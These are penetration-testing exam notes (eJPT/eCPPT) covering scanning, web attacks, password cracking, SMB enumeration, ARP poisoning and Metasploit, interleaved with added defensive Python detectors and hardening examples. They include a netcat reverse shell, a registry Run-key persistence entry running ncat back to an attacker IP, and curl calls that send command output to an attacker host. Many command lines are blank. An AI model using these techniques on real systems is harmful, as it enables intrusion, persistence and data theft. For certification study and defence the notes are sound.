eJPT/eCPPT Notes
Useful Notes for the eJPT and eCPPT exams.
Last updated
Refer to the OWASP Testing Checklist:
Command: route
Command: ip route add <network_ip>/<cidr> via <gateway_ip> dev <network_card_name>
Recommended to change into /tmp
directory
Command: python -m SimpleHTTPServer 8080
Put things in the same directory to access them via a webpage
Start a connection: nc -v hack.me 80
Make GET request:
Only works for HTTP
Command: openssl s_client -connect hack.me:443
Use -debug, -state for more info
Use -quiet to remove connection info
Crunchbase: IT startup database, information about founders, investors, employees, buyouts, acquisitions
Whois Database: Owner name, address, email, technical contacts
Passive Enumeration
Google query: "site:company.com"
Tools:
Inspecting certificates on domains may lead to more subdomains
Tools for Subdomain Enumeration
sublist3r:
Command: sublist3r -d google.com
Has brute force option that parses provided wordlist
amass:
Install:
Example: snap run amass -ip -d google.com
fping performs a ping sweep on an IP range:
Commands:
nmap can perform ping scans with the -sn flag:
Command:
nmap can fingerprint OS with the -O flag, use the -Pn flag to skip ping:
Command: nmap -O -Pn <targets>
TCP Connect Scan:
    SYN ->
    <- SYN + ACK
    ACK ->
    RST + ACK -> (closes connection)
Scanning Closed Port:
    SYN ->
    <- RST + ACK (port is closed)
nmap Port Scanning
Common Flags:
-sT: TCP connect scan
-sS: SYN scan
-sV: Version detection
-Pn: Skips ping sweep, useful if network has firewalls or blocks ICMP packets
Incomplete nmap results on well-known services like a web server:
Example: "http?" or "tcpwrapped" means remote host closed connection without receiving data
Use nmap --reason to get more information on why a port is open or closed
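Added example (not from the original notes): the defender's view of the connect/SYN scans above. Both -sT and -sS open with a SYN, so a detector can key on initial SYNs per source and flag a source that touches many distinct (host, port) pairs in a short window. The log format and the sample lines are constructed for this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample connection log (not from the page). One record per line:
# "<ISO timestamp> <src_ip> <dst_ip> <dst_port> <tcp_flags>".
# 10.0.0.5 touches 12 distinct ports in 12 seconds (scan-like);
# 10.0.0.7 connects to port 443 three times over five minutes (normal client).
SAMPLE_LOG = "\n".join(
    [f"2024-01-01T10:00:{i:02d} 10.0.0.5 10.0.0.20 {port} S"
     for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389])]
    + ["2024-01-01T10:00:01 10.0.0.7 10.0.0.20 443 S",
       "2024-01-01T10:00:30 10.0.0.7 10.0.0.20 443 S",
       "2024-01-01T10:05:00 10.0.0.7 10.0.0.20 443 S"]
)


def parse_line(line):
    """Split one record into (timestamp, src, dst, port, flags)."""
    ts, src, dst, port, flags = line.split()
    return datetime.fromisoformat(ts), src, dst, int(port), flags


def detect_scanners(log_text, window=timedelta(seconds=30), threshold=10):
    """Return {src_ip: max_distinct_targets} for sources that sent SYNs to at
    least `threshold` distinct (dst, port) pairs inside any `window`.

    A half-open (-sS) scan never completes the handshake, which is why the
    detector counts initial SYNs rather than established sessions."""
    by_src = defaultdict(list)
    for line in log_text.strip().splitlines():
        ts, src, dst, port, flags = parse_line(line)
        if "S" in flags:
            by_src[src].append((ts, dst, port))

    findings = {}
    for src, events in by_src.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits in `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({(d, p) for _, d, p in events[start:end + 1]})
            best = max(best, distinct)
        if best >= threshold:
            findings[src] = best
    return findings


if __name__ == "__main__":
    for src, count in detect_scanners(SAMPLE_LOG).items():
        print(f"possible port scan from {src}: {count} distinct targets in 30s")
```

The window and threshold are tuning knobs; a slow scan (nmap -T0/-T1) spreads its SYNs out precisely to stay under such thresholds, so pair this with a longer-window count as well.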
Used for scanning large networks quickly, not as accurate as nmap:
Example:
Popular vulnerability scanner, uses a client & server:
Starts with a ping sweep and port scan, then probes each daemon and cross-checks responses with a vulnerability database
Prone to false positives
Installing Nessus
Command: dpkg -i nessus.deb
Usage
Commands:
Open web interface (may need to add security exception)
Setup custom policy and scan using GUI, export results
Netcat:
Command: nc <target_ip> 80
After connecting, send a valid HTTP request:
Netcat only works on HTTP websites, for HTTPS use OpenSSL:
Command: openssl s_client -connect target.site:443
Example:
Automated Fingerprinting Tool httprint
Example: httprint -P0 -h <target_ip> -s /usr/share/httprint/signatures.txt
Flags:
-P0: Not ping web server
-h: Define host
-s: Define signature file
GET: Used to request resource
POST: Used to submit HTML form data
HEAD: Used to grab header
PUT: Used to upload file to server
You must know the size of the file you are trying to upload
Example:
DELETE: Used to remove file from server
OPTIONS: Used to query web server for available HTTP verbs
Command: nc -lvp 8888
Connect to nc listener: nc -v 127.0.0.1 8888
To make connection UDP: Add -u
Sending file over nc:
Command: cat tobesent.txt | nc -v 127.0.0.1 8888
Reverse Shell:
Command: nc -lvp 1337 -e /bin/bash
GUI based directory enumerator
Command line based directory enumerator
Basic Usage
Commands:
Common Flags
-a: Change user agent to make requests look like they come from a browser, useragentstring.com
-c "COOKIE: XYZ": Specifies cookie in request
-u "admin:password": User authentication in request
-H "My Header: My content": Add header into request
-r: Turn off recursive search (sub directories)
-z 1000: Changes speed to one request a second
-s: Silent mode: only displays items that were found
-X ".php,.bak": Append extensions to word list
-x extensions.txt: Include file with extensions
-o results.txt: Save results in output file
Run dirb through Proxy (Burp)
Command: dirb http://google.com -p http://127.0.0.1:8080
Command:
-u for user
-p for password (no space)
site: Only include results from specified host
intitle: Filters results based on title of page
inurl: Text included in URL
filetype: Used to search for specific file extensions .pdf, .xls
AND, OR, &, |: Logical operators for queries
-: Used to filter out words
Occurs when a web application uses unfiltered user input to build the output content displayed to its end users; this lets an attacker control the HTML and JavaScript code, thus attacking the application user.
Any parameter coming from client side of web app such as:
Request headers
Cookies
Form inputs
POST parameters
GET parameters
Alert that XSS is there:
Steal cookies:
Steal cookies and send them to attacker controlled site:
Command:
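Added example (not from the original notes): the reflected-XSS condition described above, shown as a vulnerable template beside its encoded form, plus the cookie flag that blunts the cookie-theft step. The probe string, function names and cookie name are constructed for this example.

```python
import html

# Constructed sample input (not from the page): the probe used to confirm a
# parameter is reflected without encoding.
UNTRUSTED_TERM = "<script>alert(1)</script>"


def render_unsafe(term):
    """Vulnerable: the GET/POST parameter is concatenated straight into HTML,
    so any markup in it becomes part of the page."""
    return f"<p>Results for {term}</p>"


def render_safe(term):
    """Hardened: encode for the HTML text context before inserting."""
    return f"<p>Results for {html.escape(term, quote=True)}</p>"


def render_attr_safe(term):
    """Same input placed inside a quoted attribute; quote=True also encodes
    the quote characters so the value cannot break out of the attribute."""
    return f'<input name="q" value="{html.escape(term, quote=True)}">'


def reflects_active_markup(page):
    """Detection helper for a reflected-XSS check: True when the rendered
    page still contains an un-encoded <script> tag."""
    return "<script" in page.lower()


def session_cookie_header(value):
    """Mitigation for the cookie-theft step: HttpOnly keeps document.cookie
    from reading the session cookie even when an injected script executes."""
    return f"session={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    print(render_unsafe(UNTRUSTED_TERM))
    print(render_safe(UNTRUSTED_TERM))
```

Encoding must match the context the value lands in (element text, attribute, URL, JavaScript string); html.escape covers the first two, which is why the example shows both.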
In order for a web app to use database it must:
Connect to database
Submit query
Retrieve results before applications can use results
Command:
Test every supplied user input used by the web app:
GET parameters
POST parameters
HTTP headers:
User-Agent
Cookie
Accept
String terminators: ', "
Commands: SELECT, UNION
SQL Comments: #, --
Commands:
SELECT user(); -- displays current database user
SELECT substring(user(), 1, 1) = 'r'; -- returns true or false (0 or 1), effective for learning more about what the db contains
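Added example (not from the original notes): why the string terminator and comment listed above work against concatenated SQL and not against a parameterized query. The in-memory SQLite table, the user records and the probe string are constructed for this example.

```python
import sqlite3

# Constructed probe (not from the page): terminator followed by a comment.
PROBE = "alice' -- "


def make_db():
    """Constructed in-memory user table standing in for the application's DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable: user input is spliced into the SQL text, so the quote ends
    the string literal and the comment discards the password check."""
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return [row[0] for row in conn.execute(query)]


def login_parameterized(conn, username, password):
    """Hardened: placeholders keep the input as data; the quote and comment
    are compared literally against the column and never parse as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:    ", login_vulnerable(db, PROBE, "wrong"))
    print("parameterized: ", login_parameterized(db, PROBE, "wrong"))
```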
Commands:
Open source penetration testing tool that automates process of detecting SQL injection
Capable of both detecting and exploiting
Always recommended to test by hand first to avoid crashing DB
Command:
Command:
Test the id parameter of the GET request for view.php, tells sqlmap to use UNION based injection
To test POST request:
Command:
-v3: Displays queries used
--users: Enumerate users
--dbs: Enumerate connected databases
-D <dbname> --tables: Specify db and enumerate tables
-T <table> --columns: Grab columns from specified table
-C <column1>,<column2> --dump: Dump records of specified columns
--data='user=a&pass=a': POST injection, grab POST info from Burp Suite
Use auxiliary/scanner/mssql/mssql_login
On Windows machine:
On attacker machine:
On attacker machine:
On Windows machine:
Start listener on attacker machine
Open regedit on Windows machine
Navigate to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Right-click and add new string value, name ncat, edit string value and add path to ncat binary along with reverse shell syntax: "C:\Windows\System32\ncat.exe <attacker_ip> <port> -e cmd.exe"
Restart victim machine to activate shell
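Added example (not from the original notes): checking the Run key named above for the persistence pattern it describes. The `reg query` text, the value names and the indicator list are constructed for this example; only the key path comes from the notes.

```python
import re

# Constructed sample of `reg query` output for the Run key (not real output
# from any system; the value names, paths and address are made up).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    OneDrive          REG_SZ           "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    ncat              REG_SZ           C:\Windows\System32\ncat.exe 10.0.0.9 4444 -e cmd.exe
"""

VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")

# Illustrative indicators for a Run value (assumed, not an exhaustive list).
SUSPICIOUS = [
    re.compile(r"\bn?cat(\.exe)?\b.*\s-e\s+cmd\.exe", re.I),   # netcat/ncat -e cmd.exe
    re.compile(r"\bnc(\.exe)?\s", re.I),                        # bare nc binary
    re.compile(r"powershell.*\s-(enc|e|encodedcommand)\s", re.I),
]


def parse_run_values(text):
    """Yield (name, type, data) for each value line under the key."""
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            yield m.groups()


def flag_suspicious(text):
    """Return the names of Run values whose command line matches an indicator."""
    return [name for name, _type, data in parse_run_values(text)
            if any(p.search(data) for p in SUSPICIOUS)]


if __name__ == "__main__":
    for name in flag_suspicious(SAMPLE_REG_QUERY):
        print(f"suspicious Run value: {name}")
```

The same parser works on the HKEY_CURRENT_USER Run key and the RunOnce keys; a baseline of expected value names per host makes anything new stand out regardless of indicators.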
After acquiring /etc/passwd (users on Linux system) & /etc/shadow (hashed passwords on Linux system), John needs user and pass to be in the same file:
Command:
Brute Force:
To display passwords recovered by John:
Cracked passwords stored in file
Dictionary Attack
Command:
Good wordlist to install:
Tables containing passwords that have been pre-hashed saving time and computational power.
Ophcrack: Rainbow table password cracking tool
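Added example (not from the original notes): why rainbow tables work against unsalted hashes and fail against salted, iterated ones. The wordlist, the "table", the iteration count and the storage format are constructed for this example.

```python
import hashlib
import hmac
import os

# Constructed tiny wordlist (not from the page) standing in for a precomputed
# table: digest -> plaintext for every candidate password.
WORDLIST = ["password", "letmein", "hunter2", "qwerty"]
ITERATIONS = 100_000  # assumed work factor for PBKDF2


def unsalted_hash(password):
    """Plain SHA-256: the same password always yields the same digest, which
    is exactly what makes a precomputed table useful."""
    return hashlib.sha256(password.encode()).hexdigest()


RAINBOW_TABLE = {unsalted_hash(w): w for w in WORDLIST}


def table_lookup(digest):
    """Recover a password from the table, or None when the digest is absent."""
    return RAINBOW_TABLE.get(digest)


def salted_hash(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt, stored as salt$digest.
    Two hashes of the same password differ, so no table built in advance
    can match; the work factor also slows each guess."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{salt.hex()}${dk.hex()}"


def verify(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("table hit:", table_lookup(unsalted_hash("hunter2")))
    stored = salted_hash("hunter2")
    print("table hit on salted digest:", table_lookup(stored.split("$")[1]))
    print("verify:", verify("hunter2", stored))
```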
Tools used for cracking network services such as HTTP, SSH, FTP, etc.
Syntax:
Configuring Hydra
Inspect page source
Figure out how credentials are being sent to server (POST)
Figure out names of parameters being sent (pwd, usr)
Example Webpage:
-L: List of user names
-P: List of passwords
-f: Hydra will stop after first credential found
-V: Verbosity
Example SSH:
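Added example (not from the original notes): what a Hydra-style run against SSH looks like from the server's auth log, and how to separate a single-account brute force from a password spray. The log lines and the classification thresholds are constructed for this example.

```python
import re
from collections import defaultdict

# Constructed sshd-style log excerpt (not real log data): one source hammers
# root, a second tries a different username each time, a third logs in.
SAMPLE_AUTH_LOG = """\
Jan 10 10:00:01 host sshd[101]: Failed password for root from 10.0.0.9 port 4001 ssh2
Jan 10 10:00:02 host sshd[102]: Failed password for root from 10.0.0.9 port 4002 ssh2
Jan 10 10:00:03 host sshd[103]: Failed password for root from 10.0.0.9 port 4003 ssh2
Jan 10 10:00:04 host sshd[104]: Failed password for root from 10.0.0.9 port 4004 ssh2
Jan 10 10:00:05 host sshd[105]: Failed password for root from 10.0.0.9 port 4005 ssh2
Jan 10 10:00:06 host sshd[106]: Failed password for root from 10.0.0.9 port 4006 ssh2
Jan 10 10:00:20 host sshd[107]: Failed password for invalid user admin from 10.0.0.11 port 5001 ssh2
Jan 10 10:00:21 host sshd[108]: Failed password for invalid user test from 10.0.0.11 port 5002 ssh2
Jan 10 10:00:22 host sshd[109]: Failed password for invalid user oracle from 10.0.0.11 port 5003 ssh2
Jan 10 10:00:23 host sshd[110]: Failed password for alice from 10.0.0.11 port 5004 ssh2
Jan 10 10:00:24 host sshd[111]: Failed password for bob from 10.0.0.11 port 5005 ssh2
Jan 10 10:01:00 host sshd[112]: Accepted password for alice from 10.0.0.3 port 4100 ssh2
"""

FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port"
)


def summarize_failures(log_text):
    """Return {src: {"attempts": n, "users": [...]}} for every source that
    produced a failed-password line."""
    summary = defaultdict(lambda: {"attempts": 0, "users": set()})
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            entry = summary[m["src"]]
            entry["attempts"] += 1
            entry["users"].add(m["user"])
    return {src: {"attempts": e["attempts"], "users": sorted(e["users"])}
            for src, e in summary.items()}


def classify(log_text, threshold=5):
    """Label sources at or above `threshold` failures. Many distinct users
    from one source looks like spraying; repeated tries on one account looks
    like a straight brute force (heuristic labels chosen for this example)."""
    result = {}
    for src, e in summarize_failures(log_text).items():
        if e["attempts"] < threshold:
            continue
        pattern = "spray" if len(e["users"]) >= 3 else "brute_force"
        result[src] = {"attempts": e["attempts"], "pattern": pattern}
    return result


if __name__ == "__main__":
    for src, info in classify(SAMPLE_AUTH_LOG).items():
        print(f"{src}: {info['attempts']} failures, pattern={info['pattern']}")
```

Hydra's -L/-P lists produce exactly these shapes: one user with a long password list gives the first pattern, a long user list with a few passwords gives the second.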
\\servername\ShareName\file.net
\\ComputerName\C$: Lets admin access volume on local machine
\\ComputerName\admin$: Points to the Windows installation directory
\\ComputerName\ipc$: Used for interprocess communication
An anonymous connection to an inter-process communication network service on Windows-based computers:
Check and see if the target has any file server enabled
nbtstat -A 10.123.162.2 or nbtstat /? for help
The third line down will tell you if the target is sharing any files in the <> field
If file server is enabled, enumerate shares with NET VIEW
NET VIEW <target_ip>
Try to connect to share
NET USE \\<target_ip>\IPC$ '' /u:''
(connect to the IPC$ share without authentication)
enum:
Script that automates enumeration of shares
Commands:
winfo:
Another enumeration tool
Command:
nmblookup -A <target_ip>
smbclient -L \\:<target_ip> -N
Use instead: smbclient -L <WORKGROUP> -I <TARGET_IP> -N -U ""
(allows you to see services on target, -N forces no password)
smbclient //<target_ip>/IPC$ -N
Use instead: smbclient \\\\<target_ip>\\<target_share> -N
(connects to IPC share without authentication)
enum4linux script:
Enumerates shares
Brute force enumeration:
samrdump.py:
Enumerates info about users using null sessions
Command:
nmap smb enumeration:
Commands:
Works by changing the ARP caches on two network nodes. Attacker sends unsolicited ARP packets to the two nodes telling them to route traffic through the attacker computer.
Command:
Tool used for ARP poisoning:
Example:
-i: NIC
-t & -r: Victims
You can then run Wireshark to see the traffic
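Added example (not from the original notes): detecting the cache change described above from the ARP replies seen on the wire. Two footprints are checked: an IP whose MAC changes mid-stream, and one MAC answering for more than one IP (the attacker claims both nodes). The addresses and reply records are constructed for this example.

```python
from collections import defaultdict

# Constructed ARP reply records (not captured data): (time, sender_ip, sender_mac).
# The gateway and a host answer first; then a third MAC starts answering for both.
MAC_GW, MAC_HOST, MAC_OTHER = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:20", "aa:bb:cc:00:00:99"
SAMPLE_REPLIES = [
    ("10:00:01", "10.0.0.1", MAC_GW),
    ("10:00:02", "10.0.0.20", MAC_HOST),
    ("10:00:03", "10.0.0.1", MAC_OTHER),
    ("10:00:03", "10.0.0.20", MAC_OTHER),
]


def detect_arp_anomalies(replies, trusted=None):
    """Return alert strings for (a) an IP whose MAC changes and (b) one MAC
    answering for more than one IP. `trusted` may seed known IP->MAC
    bindings, e.g. the gateway from a static ARP entry."""
    ip_to_mac = dict(trusted or {})
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)

    alerts = []
    for ts, ip, mac in replies:
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"{ts}: {ip} moved from {previous} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"{ts}: {mac} now answers for {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_anomalies(SAMPLE_REPLIES):
        print(alert)
```

Static ARP entries for the gateway and dynamic ARP inspection on managed switches stop the cache change outright; this check is the monitoring fallback where those are not available.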
Requirements Before Use
Commands:
Command: msfconsole
Command: show -h
Command: search <search_term>
Command: show exploits
Command: use exploit/windows/ftp/turboftp_port
Command: back
Command: info
Command: options
Command: set
Command: show payloads
Command:
Command: exploit
Commands:
Commands:
Command:
Search for Meterpreter Payloads
Command: search meterpreter
Put Session in Background
Command: background
List Current Sessions
Command: sessions -l
Resume Session
Command: sessions -i 1
Get Info About Machine
Command: sysinfo
Network Info
Command: ifconfig
Routing Tables
Command: route
Get Current User ID
Command: getuid
Elevate Privilege
Command: getsystem
If operation fails, try the following:
Background session
Search bypassuac
Use exploit /windows/local/bypassuac
Set session
Exploit
Uploading/Downloading Files
Command: upload <path>
or download <path>
Use Standard OS Shell
Command: shell
See All Processes Running
Command: ps
See Process Meterpreter is Attached to
Command: getpid
Check UAC
Command: run post/windows/gather/win_privs
Migrating Process to be Stealthy
When migrating process, the new process must have the same level of privilege:
Command: ps -U SYSTEM
This command will search for all other processes with system-level privilege:
Command: migrate <pid>
Test bash sleep command to see if page is delayed:
Command: sleep 5
Use Wireshark to pick up ICMP packets:
Command: ping <attacker> -c 5
May need to use URL encoding to keep syntax intact
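Added example (not from the original notes): the application-side defect the sleep and ping tests above are probing for, shown as the vulnerable command-string pattern beside an allow-listed argv form. Nothing is executed; the functions return the command the shell or the OS would receive. The inputs, hostname pattern and function names are constructed for this example.

```python
import ipaddress
import re
import shlex

# RFC 1123-style hostname allow-list (assumed pattern for this example).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
    r"(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$", re.I)

# Constructed inputs (not from the page): a normal host and a sleep-based probe.
NORMAL_INPUT = "10.0.0.20"
PROBE_INPUT = "10.0.0.20; sleep 5"


def build_command_vulnerable(host):
    """Vulnerable pattern: the parameter is pasted into a single command
    string that a shell will parse (subprocess.run(..., shell=True) or
    PHP's system()). Returned, not run."""
    return f"ping -c 1 {host}"


def shell_tokens(command_line):
    """What the shell would see; anything beyond four tokens means the input
    carried more than a host."""
    return shlex.split(command_line)


def is_valid_host(value):
    """Allow-list check: an IP literal or a plain hostname, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))


def build_command_safe(host):
    """Hardened: validate against the allow-list, then return an argv list so
    no shell ever parses the value; a ';' would be part of one argument, and
    here it never gets that far."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    print(shell_tokens(build_command_vulnerable(PROBE_INPUT)))
    print(build_command_safe(NORMAL_INPUT))
```

The delay-based test works because the shell runs the injected `sleep` as a separate command; with the argv form there is no shell, so the same input is rejected before anything runs.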
Get Paths to Installed Programs
Command: echo $PATH
Look for Specific Tools
Command: which <tool>
See if You Can Establish TCP Connection
On Attacker:
Setup listener with nc: nc -lvp 53
On Target:
Establish TCP with curl: curl http://<attacker_ip>:<attacker_port>
Test Commands with Curl
Commands:
Test Commands with Spaces in the Output with Curl
Commands:
Command above will not display properly because there are spaces in the output, need to encode to see full output:
Command:
To decode:
Command:
Downloading Files with Curl
Command:
Uploading Files
Start simple Python HTTP server:
Command:
All files in directory you start Python server in will be available via server
Generate payload & store it in server directory:
Command:
Get payload on victim machine:
Command:
Test if file was uploaded by downloading it:
Command:
Running payload:
Command:
Spawning a Better Shell:
Command:
Spawns bash environment
There are lots of shells you can easily spawn, look them up ("spawning tty shell"):
Command:
Command:
: Search cached DNS subdomains
: Collect SSL certificates and valid domain names